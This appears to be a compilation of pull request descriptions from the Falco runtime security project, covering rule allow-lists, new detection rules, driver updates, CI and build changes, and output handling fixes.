{"output":"18:02:15.466580992: Warning K8s Operation performed by user not in allowed list of users (user=kube-apiserver-healthcheck target=<NA>/<NA> verb=get uri=/healthz resp=200)","priority":"Warning","rule":"Disallowed K8s User","time":"2020-06-29T18:02:15.466580992Z", "output_fields": {"jevt.time":"18:02:15.466580992","ka.response.code":"200","ka.target.name":"<NA>","ka.target.resource":"<NA>","ka.uri":"/healthz","ka.user.name":"kube-apiserver-healthcheck","ka …
```

k8s_audit_rules: kube-apiserver-healthcheck user whitelist

---

test/confs/psp.yaml
userspace/falco/configuration.cpp

/kind bug
Related to #1026
```release-note
update: k8s audit endpoint now defaults to /k8s-audit everywhere
```

fix: update k8s audit endpoint to /k8s-audit everywhere

---

userspace/falco/lua/output.lua

/kind bug
/area engine
`buffered_output: false` was not honored for stdout. 
This PR corrects the argument wrongly passed to the `stdout_message` that caused the problem aforementioned.
Fixes #1198
Fixes #1291
I will add some comments for further improvement.
/cc @fntlnz 
/cc @leodido 
```release-note
fix(userspace/falco): correct options handling for `buffered_output: false` which was not honored for the `stdout` output
```

correct stdout output buffering option

---

rules/falco_rules.yaml
rules/k8s_audit_rules.yaml

> /kind bug
> /kind design
> /area build
> /area engine
/area rules
> /area tests
add placeholder macros for easy customization
Fixes #
```release-note
rule(macro …
```

rules update: create placeholder macros for customization

---

docker/falco/docker-entrypoint.sh
docker/local/docker-entrypoint.sh

/kind cleanup
/area build
As per https://github.com/falcosecurity/falco/blob/master/proposals/20200506-artifacts-scope-part-2.md#action-items
Fixes #
```release-note
update: `SKIP_MODULE_LOAD` renamed to `SKIP_DRIVER_LOADER`
```

rename `SKIP_MODULE_LOAD` to `SKIP_DRIVER_LOADER`

---

.github/stale.yml

Removed not existing labels and made the error message a bit more
verbose to tell people what to expect next.
/kind cleanup
/area build
Many issues are getting closed while we want to keep them.
This is making the process of keeping them a bit easier by explaining the users what to do.
```release-note
NONE
```

build: stale bot adjustements

---

falco.yaml
userspace/engine/falco_utils.cpp
userspace/engine/falco_utils.h
userspace/falco/configuration.cpp
userspace/falco/configuration.h
userspace/falco/falco.cpp

/kind feature
NONE
This PR updates the `threadiness` configuration default value of the gRPC configuration block.
Now, the `threadiness` field is `0` by default, which means "auto".
Thus, by default, Falco will set the threadiness of the gRPC server to the number of online cores.
This is the default behavior because it has proven to behave better in the recent tests both me and @fntlnz have done.
NONE
When Falco is not able to guess the number of online cores (this can happen for various reasons), the threadiness will be set to 1 which we consider the safer value and also avoids …

gRPC auto threadiness

---

cmake/modules/sysdig.cmake

/kind bug
/area build
This driver version, among other awesome things (like userspace instrumentation
support), includes a fix for building the eBPF driver on CentOS 8 machines too.
Fixes #1129 
```release-note
fix: make the eBPF driver build work on CentOS 8
```

build(cmake/modules): update driver version to 33c00f

---

cmake/modules/sysdig.cmake
userspace/engine/json_evt.cpp
userspace/engine/json_evt.h

/kind feature
/area build
/area engine
This PR pairs with the one on libsinsp (https://github.com/draios/sysdig/pull/1635) making `sinsp_evt` and `sinsp_threadinfo` passable around as const.
It updates part of the Falco engine accordingly.
Refs https://github.com/draios/sysdig/pull/1635
Driver version updated to 85c88952b018fdbce2464222c3303229f5bfcfad.
```release-note
update: driver version is 85c88952b018fdbce2464222c3303229f5bfcfad now
```

Const correctness + Driver version update

---

userspace/falco/falco.cpp
userspace/falco/statsfilewriter.cpp

/kind bug
NONE
Renames `--stats_interval` to `--stats-interval` so to match the style of other long flags of the Falco CLI.
Fixes its behavior for values greater than 999 milliseconds.
Fixes #1280 
```release-note
BREAKING CHANGE: --stats_interval is now --stats-interval
fix: --stats-interval correctly accepts values >= 999 (ms)
```

fix --stats-interval flag for values >= 999 (ms)

---

rules/falco_rules.yaml

/kind feature
/area rules
In an AWS environment, snap can be used to install the SSM agent, which will write unit files under `etc`. This is the expected behaviour from snap.
See [the AWS docs](https://docs.aws.amazon.com/systems-manager/latest/userguide/agent-install-ubuntu.html) for more information.
None
None
```release-note
rule(Write below etc): allow snapd to write its unit files
```

rule(Write below etc): allow snapd to write its unit files

---

rules/falco_rules.yaml

/area rules
Since these two rules can create noise and we have discovered some concerns about their behavior (see https://github.com/falcosecurity/falco/issues/1314 , https://github.com/falcosecurity/falco/issues/1275 ), this PR proposes to disable them by default.
Furthermore, as discussed privately with @fntlnz and @leodido, we also considered that we have an incoming release tomorrow, thus we don't have enough time to investigate the issues mentioned above.
None, atm.
```release-note
rule(Container Drift …
```

update(rules): disable drift detection rules by default

---

CMakeLists.txt
userspace/falco/falco.cpp

/kind feature
ALL.
Support in the Falco CLI for the new ptrace implementation being merged in the driver code.
NONE
```release-note
new: Falco now supports userspace instrumentation with the -u flag
```

Initial userspace instrumentation implementation

---

CMakeLists.txt
cmake/modules/CPackConfig.cmake
cmake/modules/libyaml.cmake
docker/no-driver/Dockerfile
docker/tester/root/runners/deb.Dockerfile
docker/tester/root/runners/tar.gz.Dockerfile
test/driver-loader/runner/Dockerfile
userspace/engine/CMakeLists.txt

/kind feature
/area build
There's no reason we rely on system libyaml when we release since it doesn't add many MB to the build and doesn't require a long time to build either.
Fixes #
```release-note
new: libyaml is now bundled in the release process. Users can now avoid installing libyaml directly when getting Falco from the official release.
```

build: libyaml in bundled deps

---

userspace/falco/falco.cpp

/kind feature
/area engine
See #1302
Fixes #1302
/cc @fntlnz 
/cc @leodido 
/cc @kris-nova 
```release-note
new(userspace/falco): print the Falco and driver versions at the very beginning of the output.
```

feat(userspace/falco): print version at startup

---

.circleci/config.yml
docker/tester/root/usr/bin/entrypoint
test/CMakeLists.txt
test/README.md
test/driver-loader/run_test.sh
test/falco_traces.yaml.in
test/run_regression_tests.sh
test/trace_files/CMakeLists.txt
test/trace_files/k8s_audit/CMakeLists.txt
test/trace_files/psp/CMakeLists.txt
test/usage

/kind cleanup
/kind feature
/area build
/area tests
Ready for review.
/cc @fntlnz 
/cc @leogr 
```release-note
BREAKING CHANGE: new CLI for integration tests runner (test/run_regression_tests.sh)
docs(test): step-by-step instructions to run integration tests locally
```

Improvements to the integration tests build 

---

rules/falco_rules.yaml

> /kind bug
> /kind design
> /area build
> /area engine
/area rules
> /area tests
Reduce false positive.
Fixes #
```release-note
rule(macro user_trusted_containers): add sysdig/node-image-analyzer and sysdig/agent-slim to …
```

Exclude image analyzer

---

rules/falco_rules.yaml

/kind bug
/area rules
Add 'docker.io/falcosecurity/falco' image to  'falco_privileged_images' macro. This prevent messages like this when booting up falco :
```
Warning Pod started with privileged container (user=system:serviceaccount:kube-system:daemon-set-controller pod=falco-42brw ns=monitoring images=docker.io/falcosecurity/falco:0.24.0)
```
```release-note
rule(macro falco_privileged_images): add 'docker.io/falcosecurity/falco'
```

rule(macro falco_privileged_images): add 'docker.io/falcosecurity/falco'

---

rules/k8s_audit_rules.yaml

/area rules
Since `kubernetes-admin` user is included in some k8s distribution by (it is also used by [kubadm](https://github.com/kubernetes/kubeadm) and [kind](https://github.com/kubernetes-sigs/kind)), I believe it should be included in the allowed k8s users' list.
Fixes #1186
I've noticed that using kind. Without `kubernetes-admin`, Falco is triggering an alert for any activity performed by `kind`.
/milestone 0.25.0
```release-note
rule(list allowed_k8s_users): add "kubernetes-admin" user
```

rule(list allowed_k8s_users): add "kubernetes-admin" user

---

scripts/falco-driver-loader

Signed-off-by: Antoine Deschênes <antoine@antoinedeschenes.com>
/kind bug
> /kind design
/area build
> /area engine
> /area rules
> /area tests
Argument parser conflicts with MAX_RMMOD_WAIT undocumented variable initialization always using the $1 argument.
MAX_RMMOD_WAIT can now be set using an environment variable …

falco-driver-loader: fix conflicting $1 argument usage

---

rules/k8s_audit_rules.yaml

> /kind bug
> /kind design
> /area build
> /area engine
/area rules
> /area tests
Create a new rule to detect ephemeral container is created in a pod.
Fixes #
https://kubernetes.io/docs/concepts/workloads/pods/ephemeral-containers/
Audit log:
``` …
```

Kh add rule detect ephemeral container

---

rules/falco_rules.yaml

/kind bug
/area rules
dockerd and docker have "-current" suffix on centos and rhel. This
macro does not match causing false positives on multiple rules
using it
```release-note
macro(exe_running_docker_save): add better support for centos
```

macro(exe_running_docker_save): add better support for centos

---

cmake/modules/sysdig.cmake

/kind feature
Fixes #1354
Updating this dependency is very important to obtain builds of the driver on 5.8.x kernels.
Here is the change set:
```
113c22c4693fac5cc2db1b115c2f1ee0b6b701b7 (tag: agent/10.4.0, tag: 0.27.0, origin/master, origin/agent-release-10.4.0) better detection of critical logs in the inspect chisel
c42155dc7d5dfd68b0dd2e27937fec90c6f804fa Make probe builder failures non-fatal
2691cbc66c7faa973333d65a69909be06be21c18 Fix kmod build on Linux 5.8 (#1672)
3193643d8eceb9ce92675049974559ddef11f697 Implement registration of pending conns for audit tap (#1668) …
```

update: bump sysdig to 0.27.0

---

rules/falco_rules.yaml

/kind feature
/area rules
Since https://github.com/falcosecurity/falco/pull/1355 we can use `renameat2` syscall.
Partially #676
```release-note
rule(macro `rename`): add `renameat2` syscall
```

chore(rules): add `renameat2` to `rename` macro

---

userspace/falco/falco.cpp

> /kind bug
/area engine
We have noticed that the kernel module was not loaded always when using Falco deb/rpm packages.
When we had investigated the fallback mechanism included in those scripts (see #1365 ) we then noticed that the Falco binary is loading the module by itself at some point.
Unfortunately, the implementation was thrown an exception even if it was able to load the module correctly.
This PR just fixes the case when `open_f` works after `modprobe` thus the exception must not be thrown and the execution can continue normally.
Fixes #1347
/milestone 0.25.0
/cc @fntlnz 
**Does this PR …

fix(userspace/falco): do not always rethrow the exception

---

rules/falco_rules.yaml
test/rules/detect_connect_using_in.yaml

This update will provide information as to which process uid initiated the event.  This is really important for processes that are started by a different user name.
/kind feature
/area rules
Fixes #318
yes
```release-note
rule: adds user.loginuid to the default Falco rules that also contain user.name
```

rules: Adding user.loginuid to the default falco rules

---

rules/falco_rules.yaml

/kind bug
/kind cleanup
> /kind design
> /area build
> /area engine
/area rules
> /area tests
rules that mix and operators with or operators in a flat way (i.e. without brackets to explicitly separate them) have a couple of challenges:
- they are ambiguous to read, because the falco filter interpreter doesn't currently implement operator precedence
- they are …

added brakets to three macros to make them less ambiguous

---

proposals/20200506-artifacts-scope-part-1.md
proposals/20200818-artifacts-storage.md
proposals/20200901-artifacts-cleanup.md

/kind design
This PR introduces two proposals:
1. Artifacts Storage
A document representing the State of Art of the Falco Artifacts Storage: when they get created, how they get created, where they get published
2. Artifacts Cleanup
A document proposing the cleanup strategy to implement on top of the existing artifacts storage process
NONE
**WIP**
```release-note
docs(proposals): artifacts storage
docs(proposals): artifacts cleanup
```

proposals: Artifacts Storage + Artifacts Cleanup

---

.circleci/cleanup
.circleci/config.yml

/kind cleanup
/area build
This PR implements what described into "Artifacts Cleanup" proposal (refs https://github.com/falcosecurity/falco/pull/1375).
In particular, it adds a CI job responsible for keeping only the most recent Falco development release packages and remove the others from bintray.
NONE
Not sure if this PR needs a release-note. For some aspects it's very user releated, for others not.
We'll decide together as usual.
```release-note
NONE
```

Automatic cleanup of not recent Falco development release packages

---

rules/falco_rules.yaml

> /kind bug
> /area rules
Make L#1932 equivalent to L#1898
The sensitive mount path at L#1932:
```
container.image.repository startswith quay.io/sysdig) 
```
is missing an important trailing slash like in L#1898:
```
container.image.repository startswith quay.io/sysdig/)
```
N/A
```release-note
rule(macro falco_sensitive_mount_containers): Adds a trailing slash to avoid repo naming issues
```

Append Slash to Sensitive Mount Path startswith

---

.circleci/config.yml

/kind bug
/area build
Both "publish/packages" and "publish/packages-dev" jobs were looking for the static build in the wrong directory. Just fixed that. 
/milestone 0.26.0
Fixes #
/cc @leodido 
/cc @fntlnz 
```release-note
NONE
```

build(.circleci): fix static build path

---

rules/falco_rules.yaml
userspace/engine/falco_engine_version.h

/kind bug
/kind feature
/area engine
/area rules
This PR bumps the engine version to the expected number (7), as per https://falco.org/docs/rules/#versioning
Furthermore, it also sets the `required_engine_version` to 7 in the rule files, to show the expected error when the ruleset does not match. Unfortunately, this must be set to the entire rule files (even though it's required just by few rules) since the [`required_engine_version` does not work on rule level](https://github.com/falcosecurity/falco/pull/1273#issuecomment-662406908) (thus the PR #1273 is blocked).
/milestone 0.26.0
Fixes #1380
Fixes #1272 …

update: bump Falco engine version to 7

---

scripts/falco-driver-loader

The falco-driver-loader script calls dkms to compile the kernel
module using the default gcc.
In some systems, and in the falcosecurity/falco container image,
the defult gcc is not the right one to compile it.
The script will try to compile the module by cycling trough all the available GCCs
starting from the default one until the module is compiled the first
time.
The default gcc is the highest priority while trying.
Newer GCCs have the priority over older GCCs.
/kind feature
/area build
Fixes #1407  …

update(scripts): driver loader cycles available gcc versions

---

rules/falco_rules.yaml

/area rules
- I want to enable "Packet socket created in container" rule by default.
- "Packet socket created in container" rule was created at the end of last year. I think we can say the rule is stable.
- https://github.com/falcosecurity/falco/pull/945
- The rule can detect ARP spoofing attacks on Kubernetes.
- Ref: https://blog.aquasec.com/dns-spoofing-kubernetes-clusters
- and new kernel vulnerability(CVE-2020-14386, allow privilege escalation to node) was disclosed recently. 
- The bug is in `net/packet/af_packet.c`, so we could detect an attack to the vuln by this rule as far as I read …

enable "Packet socket created in container" by default.

---

CMakeLists.txt
cmake/modules/sysdig.cmake

/kind bug
/kind cleanup
/area build
This PR updates the sysdig version from https://github.com/draios/sysdig/commit/73554b9c48b06612eb50494ee6fa5b779c57edc0 to https://github.com/draios/sysdig/commit/2aa88dcf6243982697811df4c1b484bcbe9488a2 so Falco can benefit from the latest fixes. 
In details:
- https://github.com/draios/sysdig/commit/2aa88dcf6243982697811df4c1b484bcbe9488a2 is needed to fix the segmentation fault described in #1409 
- remove macros that now become unnecessary as done in https://github.com/draios/sysdig/pull/1684
Fixes #1409
N.B.
This PR aims to fix the problem that forced us …

new: bump driver, sinsp and scap to 2aa88dcf6243982697811df4c1b484bcbe9488a2

---

.circleci/config.yml
CMakeLists.txt
cmake/modules/static-analysis.cmake

/kind feature
/area build
This PR adds a static code analysis job to our CI pipeline.
The only implemented tool for now is cppcheck but in the way the structure is, we can add more steps.
By doing this we can also improve our scores in the CII best practices program. See #428 
The report will be generated on every PR under the `ci/circleci: static-analysis` CI pipeline.
Clicking on the pipeline and then on Artifacts > index.hml shows the report.
Fixes #
```release-note
NONE
```

Static code analysis

---

userspace/falco/falco.cpp
userspace/falco/falco_outputs.cpp
userspace/falco/falco_outputs.h

This will be used by the static build to load lua files from
alternate directories that are not tied to the compile flags
/kind feature
/area engine
This allows us to provide tarballs of static builds of falco and use `--alternate-lua-dir $(pwd)/lua` to specify where to look for lua
files.
-
This will improve user experience for users of the static build, because currently that path is hardcoded at compile time.
```release-note
new: CLI flag `--alternate-lua-dir` to load Lua files from arbitrary paths …
```

feat(falco): Provide a parameter for loading lua files from an alternate path

---

RELEASE.md

Signed-of-by: Leonardo Di Donato <leodidonato@gmail.com>
NONE
Adds tables to the release corpus template to let users looking at the PR directly download the artifacts of the current release.
NONE
```release-note
NONE
```

docs: add download/images table to release corpus template

---

docker/tester/root/usr/bin/entrypoint

/kind bug
> /kind design
> /area build
> /area engine
> /area rules
/area tests
I and @leodido noticed that the CI is reporting green tests even though some of the integrations tests are not passing.
That happened because the falco-tester entrypoint's script was not returning the exit code …

fix(test): make integration tests properly fail

---

CMakeLists.txt

/kind cleanup
/area build
libb64, a dependency that we use for base64 encoding/decoding was having an issue on armv7.
Reported by: @alexellis
Fixes #
```release-note
NONE
```

build: bump b64 to v2.0.0.1

---

rules/k8s_audit_rules.yaml

/area rules
Fixes #
```release-note
macro(allowed_k8s_users): exclude cloud-controller-manage to avoid false positives on k3s
```

macro(allowed_k8s_users): exclude cloud-controller-manage to avoid false positives on k3s

---

userspace/engine/formats.cpp
userspace/engine/formats.h
userspace/falco/event_drops.cpp
userspace/falco/falco.cpp
userspace/falco/falco_outputs.cpp
userspace/falco/falco_outputs.h
userspace/falco/grpc_queue.h
userspace/falco/grpc_server_impl.cpp
userspace/falco/logger.cpp
userspace/falco/logger.h
userspace/falco/outputs.h
userspace/falco/outputs_grpc.cpp

/kind cleanup
/area engine
This PR follows up #1412 and is preparatory for a future PR (I will make it later) that implements non-blocking outputs (as per #1417).
Fixes #
I decided to include those small changes inside a separate PR (this one) to facilitate the reviewing process.
/cc @leodido 
/cc @fntlnz 
```release-note
NONE
```

further improvements outputs impl. 

---

rules/falco_rules.yaml

/area rules
NONE
Just a bit of re-use. ♻️ 
```release-note
NONE
```

re-use `spawned_process` macro inside `container_started` macro

---

userspace/falco/falco_outputs.cpp

/kind bug
/kind cleanup
/area engine
Hardcoded values (`Critical`) for message's priority were present in `falco_outputs::handle_msg()`:
https://github.com/falcosecurity/falco/blob/47fa7d53c43455540ae7ccbe4a1445a93511f723/userspace/falco/falco_outputs.cpp#L206
https://github.com/falcosecurity/falco/blob/47fa7d53c43455540ae7ccbe4a1445a93511f723/userspace/falco/falco_outputs.cpp#L219
Although that was no problem because `handle_msg()` is being used only for drop alerts that are always emitted with `Critical` priority level, it can lead to errors in the future.
Moreover, `handle_msg()` has a `priority` field already in its signature and `syscall_evt_drop_mgr` is …

fix(userspace/falco): use given priority in falco_outputs::handle_msg()

---

userspace/engine/formats.cpp
userspace/engine/formats.h

/kind bug
/area engine
Previously, formatters were freed by LUA code when re-opening outputs.
Since now, outputs are not controlling anymore the falco_formats class (see #1412), we just free formatters only if were already initialized.
That is needed when the engine restarts (see #1446).
By doing so, we also ensure that the correct inspector instance is set to the formatter cache.
Fixes #1446
```release-note
NONE
```

fix(userspace/engine): free formatters, if any

---

rules/k8s_audit_rules.yaml

Use the right list name in the rule Full K8s Administrative Access--it
was using the nonexistent list admin_k8s_users, so it was just using the
string "admin_k8s_users".
/kind bug
> /kind design
> /area build
> /area engine
/area rules
> /area tests
Fixes # …

rule(Full K8s... Access): fix users list

---

CMakeLists.txt
proposals/20201025-drivers-storage-s3.md

/kind feature
/area build
It replaces the default value of `DRIVERS_REPO` variable with the new drivers storage on AWS S3 (as per @fntlnz's [proposal](https://github.com/falcosecurity/falco/blob/master/proposals/20201025-drivers-storage-s3.md)).
The new storage is at https://download.falco.org
Fixes #1458 
Fixes #1455
```release-note
update: DRIVERS_REPO now defaults to https://download.falco.org/driver
```

new DRIVERS_REPO default URL

---

rules/falco_rules.yaml

/area rules
`multipath`, which is run by `systemd-udevd` (in our environment), writes to `/etc/multipath/wwids`, `/etc/multipath/bindings` and a few other paths under `/etc/multipath` as part of its normal operation. Falco is sending alerts for this, but given that it's expected behaviour for `multipath`, it probably shouldn't!
For more information about multipath defaults, see https://manpages.debian.org/testing/multipath-tools/multipath.conf.5.en.html
None
None
```release-note
rule(macro multipath_writing_conf): create and use …
```

rule(macro multipath_writing_conf): create and use the macro

---

rules/falco_rules.yaml

/area rules
This PR adds a new falco rule that looks for when insmod is called as part of a execve event. Injecting LKM modules on (post build) running production instances should be rare and is a common way for rootkits that employ kernel hooking to obfuscate themselves. 
Fixes #
This is a rehashed of [PR#1389](https://github.com/falcosecurity/falco/pull/1389) just cleaned up DCO as well as https://github.com/falcosecurity/falco/pull/1401
Yes new rule in falco_rules.yml
```release-note
rule(Linux Kernel Module injection …
```

adding lkm rule

---

scripts/falco-driver-loader

/kind bug
/area engine
Attempting to start falco on a host that had a similarly named module
(e.g., "falcon") would cause the falco-driver-loader to loop attempting
to rmmod falco when falco was not loaded.
falco-driver-loader will now inspect only the first column of lsmod
output and require the whole search string to match
Fixes #1468
```release-note
NONE
```

fix(scripts/falco-driver-loader): lsmod usage

---

README.md

Co-Authored-By: Leonardo Grasso <me@leonardograsso.com>
Co-Authored-By: Massimiliano Giovagnoli <massimiliano.giovagnoli.1992@gmail.com>
Co-Authored-By: Jonah Jones <jonahjones094@gmail.com>
```release-note
NONE
```

docs: adding the kubernetes privileged use case to use cases

---

cmake/modules/sysdig-repo/patch/libscap.patch

/kind bug
/area build
NONE
This bug happens when many Falco instances start because the check of how many driver consumers can work at the same time is not correct.
```release-note
fix: a bug that prevents Falco driver to be consumed by many Falco instances in some circumstances
```

patch the max_consumers parameter of the Falco kernel-module driver

---

docker/driver-loader/Dockerfile
docker/falco/Dockerfile
docker/no-driver/Dockerfile

/kind bug
/kind cleanup
/area build
This PR solves the problem described in #1491 and makes env vars consistent between the "falco" and the "no-driver" docker images.
It also updates the container labels with the correct docker usage command line.
Fixes #1491
/milestone 0.27.0
```release-note
fix: set `HOST_ROOT=/host` environment variable for the `falcosecurity/falco-no-driver` container image by default
```

fix(docker): missing HOST_ROOT env in "no-driver" docker image

---

falco.yaml
userspace/falco/configuration.cpp
userspace/falco/configuration.h
userspace/falco/falco.cpp
userspace/falco/falco_outputs.cpp
userspace/falco/falco_outputs.h
userspace/falco/outputs.h
userspace/falco/outputs_file.cpp
userspace/falco/outputs_file.h
userspace/falco/outputs_grpc.cpp
userspace/falco/outputs_grpc.h
userspace/falco/outputs_http.cpp
userspace/falco/outputs_http.h
userspace/falco/outputs_program.cpp
userspace/falco/outputs_program.h
userspace/falco/outputs_stdout.cpp
userspace/falco/outputs_stdout.h
userspace/falco/outputs_syslog.cpp
userspace/falco/outputs_syslog.h
userspace/falco/schema.proto
userspace/falco/watchdog.h

/kind feature
/area engine
This PR aims to introduce a non-blocking Falco's outputs processing, as per #1417. In details:
- https://github.com/falcosecurity/falco/pull/1451/commits/f449316c2f3f0570c4d9bfd4773a93c1d034af4f simplified (again) the outputs interface by using a single struct as param and melting together the two output methods (i.e., `output_event()` and `output_msg()`);
- https://github.com/falcosecurity/falco/pull/1451/commits/d59d2a4b2a40142c69450d151610d92ff4141994 introduced a bounded concurrent message queue (used for control commands too) that sits between:
- the handlers for incoming events/messages (i.e., the producers) that run in the main …

feat: asynchronous outputs and slow outputs detection

---

userspace/falco/configuration.cpp
userspace/falco/falco.cpp

Fixes: #1406
Signed-off-by: Spencer Krum <nibz@spencerkrum.com>
/kind bug
> /kind design
> /area build
/area engine
> /area rules
> /area tests
When there is a config file that can't be read and a command line config set, that can create a seg fault. Instead of supporting the use case where the user doesn't have a config file, force the user …

Better handle not having a config file

---

CMakeLists.txt

Because of https://gitlab.kitware.com/cmake/cmake/-/issues/16419, every
time one compiles, some external projects gets updated causing rebuild.
Set UPDATE_DISCONNECTED on EXTERNALPROJECT_ADD, since we can assume git
tags we're using will not change.
Signed-off-by: deepskyblue86 <angelopuglisi86@gmail.com>
> /kind bug
/kind cleanup
> /kind design
cmake
/area build
> /area engine
> /area rules
> /area tests
> /area …

chore(cmake/modules): avoid useless rebuild

---

cmake/modules/OpenSSL.cmake
cmake/modules/gRPC.cmake
cmake/modules/jq.cmake
cmake/modules/static-analysis.cmake
cmake/modules/yaml-cpp.cmake

Have some cmake variables (e.g. *_INCLUDE and *_LIB) marked as advanced,
in order to have a cleaner ccmake menu.
Signed-off-by: Angelo Puglisi <angelopuglisi86@gmail.com>
> /kind bug
/kind cleanup
> /kind design
/area build
> /area engine
> /area rules
> /area tests
Cleaner ccmake menu
Fixes # …

chore(cmake): mark some variables as advanced

---

userspace/falco/grpc_server_impl.cpp
userspace/falco/version.proto

Add two new fields in the version service for falco's engine version and
the checksum of all of the fields it understands.
This will require rebuilding/re-releasing all the clients.
Signed-off-by: Spencer Krum <nibz@spencerkrum.com>
> /kind bug
> /kind design
/kind feature
> /area build
> /area engine
> /area rules
> /area tests
Adds engine version to version …

feature(grpc): Add engine version to version svc

---

.circleci/config.yml

/kind feature
/area build
Opening this PR with @jonahjon.
The goal here is to publish the Falco containers images (both the master one and the release one) to the AWS ECR Public registry 📦 
As proposed by @jonahjon during yesterday's community call.
In fact, as discussed, it can be very useful for our community to be able to download Falco container images from different registries, especially since the latest changes to the Docker Hub.
TODOs:
The following steps could be added in a follow-up PR:
- Publish container image (`falcosecurity:falco-no-driver:master`)
- Publish container image (`falcosecurity:falco-no-driver:<version>`)
- Publish container image …

Publish Falco container image to AWS ECR Public registry

---

proposals/20200828-structured-exception-handling.md

This proposes adding exceptions as a first class object to falco rules
files.
It adds a new key "exceptions" to rule objects that allows a rule
writer to define tuples of field names that comprise an exception, and a
new top level object "exception" that contains lists of tuples of field
values that define exceptions to rules.
> /kind bug
> /kind design
/kind feature
> /area build
> /area engine
> /area rules
> …

Proposal on better exception handling

---

rules/falco_rules.yaml

/kind bug
/area rules
Adds exe_running_docker_save as an exception to the "Create Hidden Files or Directories" and "Mkdir binary dirs" rules, as these rules can be triggerred when a container is created. This brings these rules in line with similar rules which already contain this exception.
Yes.
```release-note
Adds exe_running_docker_save as an exception to the "Create Hidden Files or Directories" and "Mkdir binary dirs" rules, as these rules can be triggerred when a container is created.
```

Allow exe_running_docker_save in the "Create Hidden Files or Directories" and "Mkdir binary dirs" rules

---

.circleci/OWNERS

NONE
@jonahjon is already a top contributor to the [test-infra](https://github.com/falcosecurity/test-infra) repository.
In the past months, he put a lot of effort into helping us to create a better Falco Infrastructure.
Among other things, in December, I and @jonahjon paired also to publish the main Falco container image (`falcosecurity/falco`) on the AWS ECR gallery (see [PR 1512](https://github.com/falcosecurity/falco/pull/1512)).
Now, he wants to do the same for the other Falco container images (eg., `no-driver`, ...).
Also, he wants to help to move some CI jobs Falco needs to …

docs(.circleci): adding Jonah to Falco CI maintainers

---

cmake/modules/sysdig-repo/patch/libscap.patch

/kind cleanup
/area build
Very small improvement required to reduce the likelihood that the patching process will fail when the upstream file gets modified.
Fixes #
Not a big issue right now, but may be useful in development since the patching process is already failing if using the latest commit from sysdig. I stumbled upon this problem while experimenting.
/cc @leodido 
```release-note
NONE
```

chore(cmake): remove unnecessary whitespace patch

---

.circleci/config.yml

We released 0.27.0 but we had a small error in the circleci config to release on ECR. This is minor since ECR is just in preview but wanted to have it fixed for the next release.
An image with the same sha had been published by @leodido on ECR manually only for this time.
/kind bug
/area build
Fixes #
```release-note
NONE
```

update(.circleci): fix tag definition for ECR image push on releases

---

RELEASE.md

Did this change to the release docs so that we don't forget to link the new ECR images in releases.
See https://github.com/falcosecurity/falco/pull/1512
```release-note
NONE
```

docs(RELEASE.md): link the ecr images in releases

---

proposals/2021019-libraries-donation.md

Donate:
- libsinsp
- libscap
- the kernel module driver
- the eBPF driver sources
by moving them to the Falco project.
NONE
```release-note
docs(proposals): libraries and drivers donation
```

new(proposals): libraries donation

---

rules/k8s_audit_rules.yaml

eks:node-manager  is an Amazon EKS internal service role that performs specific operations for managed node groups and Fargate.
Reference: https://github.com/awsdocs/amazon-eks-user-guide/blob/master/doc_source/logging-monitoring.md
Related falco log
```
{"output":"10:56:31.181308928: Warning K8s Operation performed by user not in allowed list of users
(user=eks:node-manager target=aws-auth/configmaps verb=get uri=/api/v1/namespaces/kube-system/configmaps/aws-auth?timeout=19s resp=200)","priority":"Warning","rule":"Disallowed K8s User","time":"2021-01-26T10:56:31.181308928Z", "output_fields": 
{"jevt.time":"10:56:31.181308928","ka.response.code":"200","ka.target.name":"aws-auth","ka.target.resource":"configmaps","ka.uri":"/api/v1/namespaces/kube-system/configmaps/aws-auth?timeout=19s","ka. …
```

add eks:node-manager to allowed_k8s_users list

---

falco.yaml
userspace/falco/configuration.cpp
userspace/falco/configuration.h
userspace/falco/webserver.cpp
userspace/falco/webserver.h

/kind feature
Add an initial implementation to have a `heatlhz` endpoint, this is useful when running the workload in kubernetes so we can add liveness/read probes to do the checks and fail when is not responding.
In the future, we can have some deep checks if needed.
This PR is the initial to fix this issue: https://github.com/falcosecurity/charts/issues/53
tried my best with c++ 😄 
/assign @fntlnz  @leodido 
Fixes #
```release-note
falco: add healthz endpoint
```

falco: add healthz endpoint

---

rules/falco_rules.yaml

Added Rule Sudo Potential Privilege Escalation (CVE-2021-3156)
Open Issue https://github.com/falcosecurity/falco/issues/1540
Signed-off-by: darryk5 stefano.chierici@sysdig.com
> /kind bug
> /kind design
> /area build
> /area engine
/area rules
> /area tests
Fixes #1540  …

Update falco_rules.yaml (CVE-2021-3156)

---

rules/falco_rules.yaml

Note: the parsed logs on ES shows that `rhsmcertd-worke` is not pname or aname[*] but can be matched by proc.pname= `rhsmcertd`.
What type of PR is this?
Any specific area of the project related to this PR?
/area rules
```release-note
rule(list rpm_binaries): add rhsmcertd
rule(list deb_binaries): add apt.systemd.daily
```

package manager launched makro - rhsm cert updates, apt

---

rules/falco_rules.yaml

Signed-off-by: Spencer Krum <nibz@spencerkrum.com>
> /kind bug
> /kind design
> /area build
> /area engine
/area rules
> /area tests
Rule exceptions for ibm cloud
Fixes #
```release-note
rule(list …
```

chore(rules): Rule exceptions for ibm cloud

---

docker/falco/Dockerfile

Flex is needed for building bpf module on recent amazon linux images.
https://github.com/falcosecurity/falco/issues/1558
/kind bug
> /kind design
/area build
> /area engine
> /area rules
> /area tests
The bpf module fails to build on recent amazon linux2 versions with docker (k8s) deploys. …

Add flex to docker for building bpf module on recent amazon linux2

---

.circleci/config.yml

Signed-off-by: jonahjon <jonahjones094@gmail.com>
/kind feature
/area build
Uploads other Falco images `no-driver` and `driver-loader` to AWS public gallery.
No
```release-note
new: falco-no-driver container images on AWS ECR gallery
new: falco-driver-loader container images on AWS ECR gallery
```

adding other alternate AWS builds to circleCI

---

rules/falco_rules.yaml

Signed-off-by: Shane Lawrence <shane@lawrence.dev>
> /kind bug
/kind cleanup
> /kind design
> /area build
> /area engine
/area rules
> /area tests
This cleans up the `Write below monitored dir` rule by changing its lists and macros. The `user_ssh_directory` macro was created with a less precise condition while awaiting …

rule (Write below monitored dir): Clean up and use glob matching.

---

rules/falco_rules.yaml

> /kind bug
> /kind design
> /area build
> /area engine
/area rules
> /area tests
1. Add rules `Debugfs Launched in Privileged Container` and `Mount Launched in Privileged Container` to detect container escape activities inside privileged containers.
2. Add `k3s-agent` in the whitelist in rule `Set Setuid or Setgid bit` to reduce FP.
**Which …

Kh add rule for container escape

---

falco.yaml
test/README.md
test/confs/drops_ignore_log.yaml
test/confs/drops_log.yaml
test/confs/drops_threshold_neg.yaml
